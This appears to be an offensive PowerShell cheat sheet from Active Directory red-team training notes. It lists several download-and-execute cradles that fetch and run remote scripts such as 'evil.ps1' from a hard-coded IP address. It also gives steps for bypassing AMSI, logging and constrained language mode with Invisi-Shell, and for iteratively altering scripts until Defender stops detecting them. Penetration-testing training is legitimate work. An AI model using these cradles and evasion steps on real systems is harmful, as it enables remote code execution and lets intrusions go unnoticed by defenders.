# PowerShell ## Loading a Module ``` • Load a PowerShell script using dot sourcing . C:\AD\Tools\PowerView.ps1 • A module (or a script) can be imported with: Import-Module C:\AD\Tools\ADModulemaster\ActiveDirectory\ActiveDirectory.psd1 • All the commands in a module can be listed with: Get-Command -Module ``` ## Script Execution 
• Download execute cradle
iex (New-Object Net.WebClient).DownloadString('https://webserver/payload.ps1')

$ie=New-Object -ComObject
InternetExplorer.Application;$ie.visible=$False;$ie.navigate('http://192.168.230.1/evil.ps1
');sleep 5;$response=$ie.Document.body.innerHTML;$ie.quit();iex $response

PSv3 onwards - iex (iwr 'http://192.168.230.1/evil.ps1')

$h=New-Object -ComObject
Msxml2.XMLHTTP;$h.open('GET','http://192.168.230.1/evil.ps1',$false);$h.send();iex
$h.responseText

$wr = [System.NET.WebRequest]::Create("http://192.168.230.1/evil.ps1")
$r = $wr.GetResponse()
IEX ([System.IO.StreamReader]($r.GetResponseStream())).ReadToEnd()
## Invisi-Shell To bypass: * System-wide transcription * AMSI * System Block Logging * CLM ``` Using Invisi-Shell • With admin privileges: RunWithPathAsAdmin.bat • With non-admin privileges: RunWithRegistryNonAdmin.bat • Type exit from the new PowerShell session to complete the clean-up. ``` ## Bypassing AV Signatures for Powershell Use tools like AMSITrigger, DefenderCheck to find out what part of the script defender is detection. To obfuscate entire script, use Invoke-Obfuscation. ### AMSI Trigger Steps to avoid signature based detection are pretty simple: 1. Scan using AMSITrigger 2. Modify the detected code snippet 3. Rescan using AMSITrigger 4. Repeat the steps 2 & 3 till we get a result as “AMSI\_RESULT\_NOT\_DETECTED” or “Blank” ``` Simply provide path to the script file to scan it: AmsiTrigger_x64.exe -i C:\AD\Tools\Invoke-PowerShellTcp_Detected.ps1 DefenderCheck.exe PowerUp.ps1 ```